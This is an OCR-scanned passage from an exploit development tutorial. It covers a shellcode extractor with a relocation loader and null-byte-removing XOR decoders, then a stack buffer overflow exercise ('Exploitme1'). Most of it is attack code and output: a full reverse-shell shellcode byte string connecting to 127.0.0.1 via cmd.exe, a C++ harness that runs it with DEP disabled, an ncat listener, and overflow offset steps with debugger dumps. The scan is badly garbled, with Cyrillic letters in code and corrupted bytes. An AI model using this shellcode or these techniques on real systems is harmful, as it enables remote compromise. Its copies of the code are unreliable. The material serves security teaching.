We сап inspect this directory and look for addresses of locations that 


1. are contained іп the shellcode (i.e. go from .text:0 to the main function excluded), 
2. contains pointers to data in 


For example, the Relocation Directory will contain, among many other addresses, the address 40116Bh 


which locates the last four bytes of the instruction . These bytes form the address 402118h 
which points to the string contained in (which starts at address 402000h). 

Let’s look at the function . In the first part we extract the section: 

Python 


(exe file, shellcode len): 


Extracts the shellcode from the .text section of the file exe file and the string 
relocations. 
Returns the triple (shellcode, relocs, addr to strings). 


pe = pefile.PE(exe file) 
shellcode = 
rdata = 
rs in pe.sections: 
if s. Name == Чех! 01010": 
<snip> 
s.Name == '.rdata\0\0': 
rdata_start = s.VirtualAddress 
rdata_end = rdata_start + s.Misc_VirtualSize 
rdata = pe.get_data(rdata_start, s.Misc_VirtualSize) 


shellcode 3 
Exception('.text section not found’) 
rdata : 





Exception('.rdata section not found’) 


The relevant part is the body of the 


In the second part of the same function, we analyze the relocations, find the locations within our shellcode 
and extract from the null-terminated strings referenced by those locations. 


As we already said, we're only interested in locations contained in our shellcode. Here's the relevant part of 
the function : 


Python 
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addr to strings = () 
yr rel data in pe.DIRECTORY ENTRY BASERELOC: 
for entry in rel data.entries[:-1]: 
shellcode start «- entry.rva « shellcode end: 


relocs.append(entry.rva - shellcode start) 
string va = pe.get dword at rva(entry.rva) 
string гуа = string va - ре.ОРТІОМАІ HEADER.ImageBase 


if string rva « rdata start or string rva >= rdata end: 
Exception('shellcode references a section other than .rdata’) 
str = get cstring(rdata, string rva - rdata start) 
str : 
Exception('Cannot extract string from .rdata') 
addr to strings[string va] = str 





1 (shellcode, relocs, адаг to strings) 


is a list of data structures which contain a field named which 
is a list of relocations. First we check that the current relocation is within the shellcode. If it is, we do the 
following: 


1 we append to the offset of the relocation relative to the start of the shellcode; 

2. we extract from the shellcode the DWORD located at the offset just found and check that this 
DWORD points to data in : 

3. we extract from the null-terminated string whose starting location we found in (2); 

4 we add the string to 


Note that: 
i. contains the offsets of the relocations within shellcode, i.e. the offsets of the DWORDs within 


shellcode that need to be fixed so that they point to the strings; 
ii. is a dictionary that associates the addresses found in (2) above to the actual strings. 


adding the loader to the shellcode 


The idea is to add the strings contained in to the end 
of our shellcode and then to make the code in our shellcode reference loader 
those strings. Unfortunately, the — linking must be done at ЭР 
: А : original 
runtime because we don’t know the starting address of the shellcode. shellcode 
To do this, we need to prepend а sort of “loader” which fixes the 
shellcode at runtime. Here’s the structure of our shellcode after the off1 off2 
transformation: off3 
5111 
аге DWORDS which point to the locations іп the original shellcode str2 


that need to be fixed. The loader will fix these locations so that they 
point to the correct strings 
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To see exactly how things work, try to understand the following code: 
Python 


dd loader to shellcode( 
( ) == 0: 


АЙТИ 
retum 


1 =| 
OxE8, 0x00, 0x00, 0x00, 0x00, 


Ox5E, 

Ox8B, OxFE, 

0x81, OxC6, х[0], х[1], х[2], х[3], 
OxB9, угој, у[1], у[2], УІЗІ, 
OxEG; 


OxAD, 


0x01, Ox3C, 0x07, 
OxE2, OxFA 
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1 ".join([chr(b) for b in (code + byte shellcode)]) + ".join(final part) 


Let's have a look at the loader: 
Assembly (x86) 


, shellcode start + len(shellcode) - here 
, len(relocs) 


again 
shellcode start: 
<shellcode> 
relocs: 
off1 |off2|... 
str1|str2]... 





The first CALL is used to get the absolute address of in memory. The loader uses this information to fix 
the offsets within the original shellcode. ESI points to 50 is used to read the offsets one by one. 
The instruction 


ADD [EDI+EAX], EDI 


fixes the locations within the shellcode. EAX is the current which is the offset of the location relative to 

. This means that EDI+EAX is the absolute address of that location. The DWORD at that location 
contains the offset to the correct string relative to . By adding EDI to that DWORD, we turn the DWORD 
into the absolute address to the string. When the loader has finished, the shellcode, now fixed, is executed. 


To conclude, it should be said that is called only if there are relocations. You can 
see that in the main function: 
Python 


<snip> 
len(relocs) != 0: 
nt('Found %а reference(s) to %d string(s) in .rdata' Yo (len(relocs), len(addr to strings))) 
nt('Strings:') 
s in addr to strings.values(): 


nt( ' + sp-1]) 


shellcode - add loader to shellcode(shellcode, relocs, addr to strings) 


(Мо relocations found") 





<snip> 
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Removing nuli-bytes from the shellcode (1) 


After relocations, if any, have been handled, it's time to deal with the null bytes present in the shellcode. As 
we've already said, we need to remove them. То do that, | wrote two functions: 


1. 
2. 


The first function doesn’t always work but produces shorter code so it should be tried first. The second 
function produces longer code but is guaranteed to work. 


Let’s start with . Неге” ће function definition: 


et fixed shellcode single block( 


= 
OxE8, OxFF, OxFF, OxFF, OxFF, 


0xCO, 

Ox5F, »( 

0x81, OxF1, xor2[0], xor2[1], хог2[2], хог2[3], 
0x83, OxC7, 29, ADD 
0x33, OxF6, 

ХЕ 


Ох8А, 0х07, 

0x3C, | n te, 
OxOF, 0x44, OxC6, 
OxAA, 

OxE2, OxF6 
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The idea is very simple. We analyze the shellcode byte by byte and see if there is a missing value, i.e. a 
byte value which doesn’t appear anywhere in the shellcode. Let’s say this value is 0x14. We can now 
replace every 0x00 in the shellcode with 0x14. The shellcode doesn’t contain null bytes anymore but can’t 
run because was modified. The last step is to add some sort of decoder to the shellcode that, at runtime, will 
restore the null bytes before the original shellcode is executed. You can see that code defined in the array 


Assembly (x86) 


AL, BYTE PTR [EDI] 





There are a couple of important details to discuss. First of all, this code can't contain null bytes itself, 


because then we'd need another piece of code to remove them М 


As you can see, the instruction doesn't jump to because otherwise its opcode would've been 


E8 00 00 00 00 # CALL here 


which contains four null bytes. Since the instruction is 5 bytes, is equivalent to 
The trick to get rid of the null bytes is to use 5 


E8 FF FF FF FF # CALL $+4 


That skips 4 bytes and jmp to the last FF of the itself. The instruction is followed by the 
byte CO, so the instruction executed after the is which corresponds to . Note that the 
value pushed by the is still the absolute address of the label. 


There’s a second trick in the code to avoid null bytes: 
Assembly (x86) 


http://expdev-kiuhnm.rhcloud.com 





- 80 - 





EXPLOIT DEVELOPMENT COMMUNITY 





We could have just used 
Assembly (x86) 





but that would've produced null bytes. In fact, for a shellcode of length 0x400, we would've had 


B9 00 04 00 00 MOV ECX, 400h 


which contains 3 null bytes. 


To avoid that, we choose a non-null byte which doesn’t appear in 000004001. Let's say we choose 0x01. 
Now we compute 


<xor value 1 for shellcode Іеп> = 00000400h хог 01010101 = 01010501h 
<xor value 2 for shellcode Іеп> = 01010101h 


The net result is that <xor value 1 Тог shellcode len> and <xor value 2 for shellcode |еп> are both null-byte 
free and, when xored, produce the original value 400h. 


Our two instructions become: 


B9 01 05 01 01 MOV ECX, 01010501h 


81F101010101 ХОК ECX, 01010101h 





The two xor values are computed by the function get xor values. 


Having said that, the code is easy to understand: it just walks through the shellcode byte by byte and 
overwrites with null bytes the bytes which contain the special value (0x14, in our previous example). 


Removing null-bytes from the shellcode (Il) 


The method above can fail because we could be unable to find a byte value which isn't already present in 
the shellcode. If that happens, we need to use get fixed shellcode, which is a little more complex. 


The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a "missing byte" 
because a byte can have 255 non-zero values. We could choose a missing byte for each block and handle 
each block individually. But that wouldn’t be very space efficient, because for a shellcode of 254*N bytes we 
would need to store N “missing bytes” before or after the shellcode (the decoder needs to know the missing 
bytes). A more clever approach is to use the same “missing byte” for as many 254-byte blocks as possible. 
We start from the beginning of the shellcode and keep taking blocks until we run out of missing bytes. When 
this happens, we remove the last block from the previous chunk and begin with a new chunk starting from 
this last block. In the end, we will have a list of «missing byte, num blocks» pairs: 
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[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...] 


| decided to restrict to a single byte, so is between 1 and 255. 


Here’s the part of which splits the shellcode into chunks: 


get_fixed_shellcode( 


=0 


while i < 


е[:1+254]]) 


if | 


Like before, we need to discuss the “decoder” which is prepended to the shellcode. This decoder is a bit 
longer than the previous one but the principle is the same. 


Неге’$ the code: 
Python 
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code = ([ 
OxEB, len(bytes blocks)] * 


bytes blocks + [ 
OxE8, OxFF, OxFF, OxFF, OxFF, 


0xCO, 

Ox5F, 

0хВ9, хог1[0], xor1[1], xor1[2], хог1[3], 

0x81, OxF1, xor2[0], xor2[1], xor2[2], xor2[3], 
Ox8D, Ox5F, -(len(bytes blocks) + 5) & OxFF, 
0x83, OxC7, 0x30, 


OxBO, OxFE, 

OxF6, 0x63, 0x01, 
OxOF, OxB7, OxDO, 
0x33, OxF6, 
OxFC, 


Ox8A, 0x07, 
ОХЗА, 0x03, 
ОхОР, 0x44, ОхСб, 
OxAA, 
0x49, 

0x74, 0x07, 
0x4A, 
0x75, ОхЕ2, 
0x43, 

0x43, 
ОХЕВ, 0xE3 





is the array 


[missing byte1, num blocks1, missing byte2, num blocks2, ...] 





we talked about before, but without pairs. 


Note that the code starts with a which skips . For this to work 

must be less than or equal to Ox7F. But as you can see, appears in another instruction as 
well: 

Python 





Ox8D, Ox5F, -(len(bytes blocks) + 5) & OxFF, 


This requires that is less than or equal to , 50 this is the final condition. This is 
what happens if the condition is violated: 
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Python 


iflen(bytes blocks) > Ox7f - 5: 





return None 


Let's review the code in more detail: 
Assembly (x86) 


JMP SHORT skip bytes 
bytes: 


skip bytes: 
CALL $ + 4 
here: 
(FF)CO = INC EAX 
POP EDI 
MOV ECX, «хог value 1 for shellcode len? 
XOR ECX, «xor value 2 for shellcode len»? 
LEA EBX, [EDI * (bytes - here)] 
ADD EDI, shellcode begin - here 
loop1: 
MOV AL, OFEh 
MUL AL, BYTE PTR [EBX* 1] 
MOVZX EDX, AX 
XOR ESI, ESI 
CLD 
loop2: 
MOV AL, BYTE PTR [EDI] 
CMP AL, BYTE PTR [EBX] 
CMOVE EAX, ESI 
STOSB 
DEC ЕСХ 
JE зће соде begin 
DEC EDX 
JNE loop2 
INC EBX 
INC EBX 
JMP loop1 
shellcode begin: 





Testing the script 
This is the easy part! If we run the script without any arguments it says: 


Shellcode Extractor by Massimiliano Tomassoli (2015) 


Usage: 
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Sce.py «exe file> «map file> 


If you remember, we told the linker of VS 2013 to also produce a map file. Just call the script with the path to 
the exe file and the path to the map file. Here's what we get for our reverse shell: 


Shellcode Extractor by Massimiliano Tomassoli (2015) 


Extracting shellcode length from "mapfile”... 


shellcode length: 614 


Extracting shellcode from "зпе!соде.ехе" апа analyzing relocations... 


Found З reference(s) to З string(s) in .rdata 
Strings: 

ws2 32 || 

ста.ехе 


127.0.0.1 


Fixing the shellcode... 


final зће соде length: 715 


char shellcode[] = 
"\хе8\хН\хЯ\хЯ\хН\хс0\х5АхЬ9\ха8\хОЗ\х01\х01\х81\хЕ1\х01\хО1 " 
"\хО1\х01\х83З\хс7 \х1а\х3З\хЕ6\хЕс\хда\х07\хЗс\х05\хОх44\хсб\хаа" 
"\хе2\хЕ6\хе8\х05\х05\х05\х05\х5е\х8Ь\хГе\х81\хсб\х7Б\х02\х05\х05" 
"\xb9\x03\x05\x05\x05\xfclxad\x01\x3c\x07\xe2\xfa\x55\x8b\xec\x83" 
"\xe4\xf8\x8 1 \xec\x24\x02\x05\x05\x53\x56\x5 7\xb9\x8dlx 1 0\xb7\xf8" 
"\хе8\ха5\хо1\х05\хО5\хб8\х87\х02\х05\хО5\ххао\хр9\х40\ха5\хас" 
"\x2d\xe8\x94\x0 1\x05\x05\xb9\x6f\xf1\xd4\x9f\ix8b\xfO0\xe8\x88\x01" 
"\x05\x05\xb9\x82\xa 1\x0d\xa5\x8b\xf8\xe8\x7c\x0 1\x05\x05\xb9\x70" 
"\xbe\x1c\x23\x89\x44\x24\x1 8\xe8\x6e\x01\x05\x05\xb9\xd 1\xfe\x73" 
"\x1b\x89\x44\x24\x0c\xe8\x60\x01\x05\x05\xb9\xe2\xfa\x1 b\x01\xe8" 
"\х56\х01\х05\х05\хЬ9\хс9\х53\х29\хас\х89\х44\х24\х20\хе8\х48\х01" 
"\х05\х05\хр9\хбе\х85\х1 с\х5с\х89\х44\х24\х1с\хе8\хЗа\х01\х05\х05" 
"\xb9\xe0\x53\x31\x4b\x89\x44\x24\x24\xe8\x2c\x01\x05\x05\xb9\x98" 





85 http: //expdev-kiuhnm.rhcloud.com 








EXPLOIT DEVELOPMENT COMMUNITY 


"\х94\х8е\хса\х8Ь\ха8\хе8\х20\х01\х05\х05\х89\х44\х24\х10\х8а\х84" 
"\х24\ха0\х05\х05\х05\х50\х68\х02\х02\х05\х05\хЯ\хаб\х3З\хс9\х85" 
"\хс0\хОАх85\ха8\х05\х05\х05\х51\х51\х51\хба\хОб\хба\хО1\хба\х02" 
"\х58\х50\хЯ\ха7\х8Б\хЮ\х3ЗЗ\хН\х8З\хРе\хА\хОВх84\хс0\х05\х05" 
"\х05\х8а\х44\х24\х14\х50\х57\х57 \х68\х9а\х02\х05\х05\хЯ\х54\х24" 
"\х2с\х85\хс0\хОВх85\ха8\х05\х05\х05\хба\х02\х57\х57\хба\х10\х8а" 
"\х44\х24\х58\х50\х8Б\х44\х24\х28\хЯ\х70\х10\хЯ\х7 0\х1 8\х#х54" 
"\х24\х40\хба\х02\х58\х66\х89\х44\х24\х28\хЬ8\х05\х7Б\х05\х05\хбб" 
"\х89\х44\х24\х2а\х8а\х44\х24\х48\х50\х\х54\х24\х24\х57\х57\х57" 
"1х57\х89\х44\х24\хЗс\х8а\х44\х24\х38\хба\х10\х50\х56\х#х54\х24" 
"\х34\х85\хс0\х75\х5с\хба\х44\х5х8Б\хсАх8а\х44\х24\х58\х3З\ха2" 
"\х88\х10\х40\х49\х7 5\хга\х8а\х44\х24\х38\х89\х7с\х24\х58\х50\х8а" 
"\х44\х24\х5с\хс7\х84\х24\х88\х05\х05\х05\х05\х01\х05\х05\х50\х52" 
"\х52\х52\хба\х01\х52\х52\х68\х92\х02\х05\х05\х52\х89\хЬ4\х24\хс0" 
"\x05\x05\x05\x89\xb4\x24\xbc\x05\x05\x05\x89\xb4\x24\xb8\x05\x05" 
"\хО5\х#ћх54\х24\х34\хба\ххх74\х24\х3Зс\х\х54\х24\х18\х33" 
"х5 7\х\хаз\х5Ах5е\хЗЗ\хс0\х56\х86\хе5\х5а\хсЗ\хЗ33\ха2\хеб" 
"\х10\хс1\хса\х0а\хЗс\хб1\хОћхбе\хсО\хтс\хОЗ\х8З\хе8\х20\хОЗ\хао" 
"\x4 1\x8a\x01\x84\xcO\x75\xealx8b\xc2\xc3\x55\x8b\xec\x83\xec\x14" 
"\X53\x56\x57\x89\x4 d\xf4\x64\xa1\x30\x05\x05\x05\x89\x45\xfclx8b" 
"\х45\хЕс\х8Ь\х40\хОс\х8Б\х40\х14\х8Б\х!8\х89\х45\хес\х8а\х4 7\хїё" 
"\X8b\x3f\x8b\x70\x1 8\x85\xf6\x74\x4 fix8b\x46\x3c\x8b\x5c\x30\x78" 
"\x85\xd b\x74\x44\x8b\x4cl\x33\x0c\x03\xce\xe8\x9elxffxfixfiix8b" 
"x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xf0\x89\x45\xfc" 
"\X3 9\x44\x33\x1 8\x7 6\x22\x8b\x0c\x8 1\x03\xce\xe8\x/d\xffixffixff" 
"\X03\x4 5\xf8\x39\x4 5\xf4\x74\x1 el\x8b\x45\xfcl\x8b\x4 d\xf0\x40\x89" 
"\X45\xfc\x3b\x44\x33\x 1 8\x72\xde\x3b\x7d\xec\x75\xa0\x33\xcO\x5f" 
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4 d\xfc\x8b\x44\x33\x24\x8d\x04\x48" 
"\xOf\xb 7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6" 
"\хер\хаа\х2{\хО5\хО5\хО5\хї2\хО5\хО5\хО5\х80\хО1\хО5\хО5\х7 7173" 
"x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65" 
"x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05"; 
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The part about relocations is very important, because you can check if everything is OK. For example, we 
know that our reverse shell uses 3 strings and they were all correctly extracted from the .rdata section. We 
can see that the original shellcode was 614 bytes and the resulting shellcode (after handling relocations and 
null bytes) is 715 bytes. 


Now we need to run the resulting shellcode in some way. The script gives us the shellcode in C/C++ format, 
so we just need to copy and paste it in a small C/C++ file. Here’s the complete source code: 


C++ 


#include <cstring> 
#include <cassert> 


1 main() { 


shellcode[] : 
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"\x4c\x33\x20\x89\x45\xf8\x03\xce\x33\xc0\x89\x4d\xfO\x89\x45\xfc" 
"\x39\x44\x33\x18\x76\x22\x8b\x0c\x81\x03\xce\xe8\x7d\xff\xff\xff" 
"\x03\x4.5\xf8\x39\x45\xf4\x74\x1 e\x8b\x45\xfc\x8b\x4d\xf0\x40\x89" 
"\x4.5\xfc\x3b\x44\x33\x1 8\x72\xde\x3b\x7d\xec\x75\xa0\x33\xcO\x5f" 
"\x5e\x5b\x8b\xe5\x5d\xc3\x8b\x4d\xfc\x8b\x44\x33\x24\x8d\x04\x48" 
"\xOf\xb7\x0c\x30\x8b\x44\x33\x1c\x8d\x04\x88\x8b\x04\x30\x03\xc6" 
"\xeb\xdd\x2f\x05\x05\x05\xf2\x05\x05\x05\x80\x01\x05\x05\x77\x73" 
"\x32\x5f\x33\x32\x2e\x64\x6c\x6c\x05\x63\x6d\x64\x2e\x65\x78\x65" 
"\x05\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x05"; 


( (shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char “shellcode = ...')"); 


char *ptr = char[ (shellcode)]; 
memopy(ptr, shellcode, (shellcode)); 


((void(*)())ptr)(); 





To make this code work, you need to disable (Data Execution Prevention) by going to 
ын and then, under : апа , set 
to . This is needed because our shellcode will be 


executed from the heap which wouldn't be executable with DEP activated. 


was introduced with C++11 (so VS 2013 CTP is required) and here is used to check that you 
use 


С++ 
char shellcode[] = "..." 





instead of 
С++ 


char *shellcode ="..." 





In the first case, is the effective length of the shellcode and the shellcode is copied onto 
the stack. In the second case, is just the size of the pointer (i.e. 4) and the pointer points to 
the shellcode in the section. 


To test the shellcode, just open a cmd shell and enter 


ncat -lvp 123 


Then, run the shellcode and see if it works. 
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Exploitme1 (“ret eip" overwrite) 


Here’s a simple C/C++ program which has an obvious vulnerability: 
С++ 


#include <cstdio> 


int main() { 
( 





The problem is that scanf() may keep writing beyond the end of the array name. То мету the vulnerability, 
run the program and enter a very long name such as 


ааааааааааааааааааааааааааааааааааааааааааааа 


The program should print 


Hi, ааааааааааааааааааааааааааааааааааааааааааааа! 


and then crash. 
The interesting thing is that by entering a particular name, we can make the program execute arbitrary code. 


First of all, in VS 2013, we'll disable DEP and stack cookies, by going to Project—properties, and modifying 
the configuration for Release as follows: 


• Configuration Properties 
[e С/С++ 
. Code Generation 
. Security Check: Disable Security Check (/GS-) 
. Linker 
о Advanced 
. Data Execution Prevention (DEP): Мо (/INXCOMPAT:NO) 


This is our main() function in assembly: 


int main() { 


01391000 55 
01391001 8B EC 
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01391003 83 EC 20 sub esp,20h 


char name[32]; 
printf("Enter your name and press ENTER\n"); 

01391006 68 00 21 39 01 push 1392100h 

0139100B FF 15 8C 203901 call dword ptr ds:[139208Ch] 
scanf("%s", name); 

01391011 8D 45 EO lea eax,[name] 

01391014 50 push eax 

01391015 68 24 21 39 01 push 1392124h 

0139101A FF 15 94 20 3901 call dword ріг ds:[1392094h] 
printf("Hi, Yos!\n", name); 

01391020 8D 45 EO lea eax,[name] 

01391023 50 push eax 

01391024 68 28 21 39 01 push 1392128h 

01391029 FF 15 8C 20 39 01 са! dword ptr ds:[139208Ch] 

0139102F 83 C4 14 ада езр,14ћ 
return 0; 

01391032 33 CO 

) 

01391034 88 Е5 

01391036 5D 

01391037 C3 





Here's the assembly code which calls main(): 


mainret = main(argc, argv, envp); 
00261222 FF 35 34 30 26 00 push dword ptr ds:[263034h] 
00261228 FF 35 30 3026 00 push dword ptr 4$:[2630301] 


0026122E FF 35 2C 30 26 00 push dword ptr ds:[26302Ch] 
00261234 E8 C7 FD FF FF call main (0261000h) 
00261239 83 C4 0C add esp,0Ch 





As you should know, the stack grows towards lower addresses. The stack is like this after the three pushes 
above: 
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esp --> argc ; third push 


argv ; second push 


envp ; first push 





The call instruction pushes 0x261239 onto the stack so that the ret instruction can return to the code 
following the cal! instruction. Just after the call, at the beginning of the main() function, the stack is like this: 
esp --> reteip | ; 0x261239 
argc ; third push 
argv ; second push 


envp ; first push 





The main() function starts with 


01391000 55 push ebp 
01391001 8B EC mov ebp,esp 
01391003 83 EC 20 sub esp,20h 





After these three instructions, the stack looks like this: 


esp --> name[0..3] ; first 4 bytes of "name" 


name[4..7] 


name[28..31] ; last 4 bytes of "name" 


ебр--> saved ebp 
reteip — ; 0x261239 


агдс ; third push 
argv ; second push 


envp ; first push 





Now, scanf() reads data from the standard input and writes it into name. If the data is longer than 32 bytes, 
ret eip will be overwritten. 


Let’s look at the last 3 instructions of main(): 


01391034 8B Е5 mov 51519451010) 
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01391036 5D 


01391037 C3 





After mov esp, ebp, the stack looks like this: 


еѕр,ерр -> saved ebp 
reteip — ;0х261239 
агас ; third push 
argv ; second push 


епур ; first push 





After pop ebp we have: 


esp --> reteip — ; 0x261239 
агас ; third push 
argv ; second push 


envp ; first push 





Finally, ret pops ret eip from the top of the stack and jumps to that address. If we change ret eip, we can 
redirect the flow of execution to wherever we want. As we've said, we can overwrite ret eip by writing 
beyond the end of the array name. This is possible because scanf() doesn't check the length of the input. 


By looking at the scheme above, you should convince yourself that ret eip is at the address name + 36. 


In VS 2013, start the debugger by pressing F5 and enter a lot of as: 


аааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа 


The program should crash апа а dialog should appear with this message: 


Unhandled exception at 0х61616161 іп exploitme1.exe: 0хС0000005: Access violation reading location 0х61616161. 





The ASCII code Тог “а: is 0x61, so we overwrote ret eip with “аааа“, i.e. 0x61616161, and the ге instruction 
jumped to 0x61616161 which is an invalid address. Now let's verify that ret eip is at name + 36 by entering 


ии или 


36 “а“ѕ, 4 "b*s and some "*c's: 


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbccccccccc 


We're greeted with the following message: 


Unhandled exception at 0х62626262 in ехройте1.ехе: 0хС0000005: Access violation reading location 0х62626262. 
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This confirms our guess. (Note that 0x62626262 is “ “) 


To summarize, here's our stack before and after 


name[0..3] 


name[4..7] 


name[28..31] 
saved ebp 
ret eip 

argc 
argv 


envp 





To make things easier, let's modify the program so that the text is read from the file 
С++ 


#include <cstdio> 


int main() { 
char name[32]; 
printf("Reading name from file...\n"); 


FILE *f = fopen("c:\\name.dat", "rb"); 
if (11) 


fseek(f, OL, SEEK END); 
long bytes = ftell(f); 
fseek(f, OL, SEEK SET); 
fread(name, 1, bytes, f); 
name[bytes] = ^0'; 
fclose(f); 


printf("Hi, %$!\п", name); 





Create the file in c^ with the following content: 


aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbcccccccccccccccccccccccccce 


Now load іп WinDbg and hit F5 (go). You should see ап exception: 
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(180с.560): Access violation - code с0000005 (first chance) 


First chance exceptions are reported before апу exception handling. 


This exception may be expected and handled. 


eax-00000000 ерх-00000000 есх=64383071 ейх=00835451 еѕі=00000001 edi-00000000 
еір=62626262 еѕр=0041#7а0 ерр=61616161 iopl=0 nv up ei pl zr па pe nc 

cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 

62626262 ?? 22? 





Let’s have a look at the part of stack pointed to by ESP: 


0:000> d Wesp 

0041f7d0 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
0041f7e0 63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00 ссссссссссс 
0041f7f0 dc #7 41 00 28 00 00 00-44 18 41 00 09 17 35 01 ..A.(...D.A...5. 
00411800 69 17 e0 fa 00 00 00 00-14 18 41 00 8a 33 0c 76 .......... A..3.V 
00411810 00 e0 fd 7e 54 18 41 00-72 9f 9f 77 00 eO fd 7e ...~T.A.r..W...~ 
00411820 2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e „-Аџ 

00411830 00 00 00 00 00 00 00 00-00 00 00 00 20 18 41 00 .......... A. 
00411840 00 00 00 00 ff ff ff ff-f5 71 аз 77 28 10 де 02 ......... ам... 

0:000» d (Qesp-0x20 

00411750 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 
0041f7cO 61 61 61 61 61 61 61 61-61 61 61 61 62 62 62 62 aaaaaaaaaaaabbbb 
00411740 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 
0041f7e0 63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00 ссссссссссс 
0041f7f0 dc #7 41 00 28 00 00 00-44 18 41 00 09 17 35 01 ..A.(...D.A...5. 
00411800 69 17 e0 fa 00 00 00 00-14 18 41 00 8a 33 0c 76 .......... А..З.у 
00411810 00 e0 fd 7e 54 18 41 00-72 9f 9f 77 00 eO fd 7e ...~T.A.r..W...~ 
00411820 2c 2d 41 75 00 00 00 00-00 00 00 00 00 e0 fd 7e „-Аџ 





Perfect! ESP points at our "c"s. Note that ESP is 0x41f7d0. Now let's run exploitme1.exe again by pressing 
CTRL+SHIFT+F5 (restart) and F5 (go). Let's look again at the stack: 


0:000> а @езр 
00421се0 63 63 63 63 63 63 63 63-63 63 63 63 63 63 63 63 сссссссссссссссс 


0042fcf0 63 63 63 63 63 63 63 63-63 63 63 00 00 00 00 00 ссссссссссс 
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0042fd00 ec fc 42 00 29 00 00 00-54 fd 42 00 09 17 12 00 ..B.)...T.B..... 
00421410 94 7f 07 21 00 00 00 00-24 fd 42 00 8a 33 0c 76 ...!....$.В..3.у 
0042fd20 00 е0 fd 7e 64 fd 42 00-72 9f 9f 77 00 eO fd 7e ...-d.B.r..w...- 


00421430 c4 79 5c 75 00 00 00 00-00 00 00 00 00 e0 fd 7e „уч 
0042fd40 00 00 00 00 00 00 00 00-00 00 00 00 30 44200 ............ 0.В. 
00421450 00 00 00 00 ff ff ff ff-f5 71 аз 77 fO 41 80 02 ....... q.w.A.. 





As you can see, ESP still points at our "c"s, but the address is different. Let's say we put our shellcode in 
place of the "c"s. We can't overwrite ret eip with Ox42fceO because the right address keeps changing. But 
ESP always point at our shellcode, so why don't we overwrite ret eip with the address of a piece of memory 
containing a JMP ESP instruction? 


Let's use mona (refresher) to find this instruction: 


0:000> .load рука.руа 
0:000> !ру топа 
Ноја оп... 
[+] Соттапа иѕеа: 
Іру mona.py 
‘mona’ - Exploit Development Swiss Army Knife - WinDbg (32bit) 
Plugin version : 2.0 r554 
PyKD version 0.2.0.29 
Written by Corelan - https://www.corelan.be 


Project раде : https://github.com/corelan/mona 


212121: 11111] 11 https://www.corelan-training.com| 
Багага /| I1 N , / #согеіап (Freenode ІКС) 
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You can use on 
a search in one 


-n 


-0 


-p «nr» 


e or more of the following global options оп any command that will perform 
or more modules, returning a list of pointers : 

: Skip modules that start with a null byte. If this is too broad, use 

option -cm nonull instead 

: Ignore OS modules 


: Stop search after <nr> pointers. 


-m <module,module,...> : only query the given modules. Be sure what you are doing! 


You can specify multiple modules (comma separated) 
Tip : you can use e * to include all modules. All other module criteria will be ignored 
Other wildcards : *blah.dll = ends with blah.dll, blah* = starts with blah, 


blah or *blah* = contains blah 


-cm <crit,crit,...> : Apply some additional criteria to the modules to query. 


-cp <crit,crit,...> 


-cpb ^x00W01' 


-х <ассе55> 


топа «comma 


- 96 


You can use one or more of the following criteria : 
aslr,safeseh,rebase,nx,os 
You can enable or disable a certain criterium by setting it to true or false 
Example : -cm aslr=true,safeseh=false 
Suppose you want to search for p/p/r in aslr enabled modules, you could call 
Imona seh -cm aslr 
: Apply some criteria to the pointers to return 
Available options are : 


unicode,ascii,asciiprint,upper,lower,uppernum,lowernum,numeric,alphanum,nonull,startswithnull,unicoderev 


Note : Multiple criteria will be evaluated using 'AND', except if you are looking for unicode + one crit 


: Provide list with bad chars, applies to pointers 
You can use .. to indicate a range of bytes (in between 2 bad chars) 

: Specify desired access level of the returning pointers. If not specified, 
only executable pointers will be return. 


Access levels can be one of the following values : R,W,X,RW,RX,WX,RWX or * 


nd» «parameter» 
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Available commands and parameters : 


? / eval | Evaluate an expression 

allocmem / alloc | Allocate some memory in the process 

assemble / asm | Convert instructions to opcode. Separate multiple instructions with # 
bpseh / sehbp | Set a breakpoint on all current SEH Handler function pointers 
breakfunc / bf | Set a breakpoint on an exported function in on or more dll's 
breakpoint /bp | Set a memory breakpoint on read/write or execute of a given address 
bytearray / ba | Creates a byte array, can be used to find bad characters 

сћапдеас! / са | Change the ACL of a given page 

compare / cmp | Compare contents of a binary file with a copy in memory 

config / conf | Manage configuration file (mona.ini) 

сору / ср | Copy bytes Нот опе location to another 

dump | Dump the specified range of memory to а file 

dumplog / dl | Dump objects present in alloc/free log file 

dumpobj / do | Dump the contents of an object 

egghunter /egg | Create egghunter code 

encode / enc | Encode a series of bytes 

filecompare / fc | Compares 2 or more files created by mona using the same output commands 


fillehunk / fchunk | Fill a heap chunk referenced by a register 


find / f | Find bytes in memory 


findmsp / findmsf | Find cyclic pattern in memory 

findwild / fw | Find instructions in memory, accepts wildcards 

flow / flw | Simulate ехесийоп flows, including all branch combinations 
fwptr / ћир | Find Writeable Pointers that get called 

geteat / eat | Show EAT of selected module(s) 

getiat / iat | Show IAT of selected module(s) 

getpc | Show getpc routines for specific registers 

gflags / gf | Show current GFlags settings from PEB.NtGlobalFlag 

header | Read a binary file and convert content to a nice 'header' string 


heap | Show heap related information 
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help | show help 

hidedebug / hd | Attempt to hide the debugger 

info | Show information about a given address in the context of the loaded application 
infodump / if | Dumps specific parts of memory to file 

jmp/j | Find pointers that will allow you to jump to a register 

jop | Finds gadgets that can be used in a JOP exploit 

kb / kb | Manage Knowledgebase data 

modules / mod | Show all loaded modules and their properties 

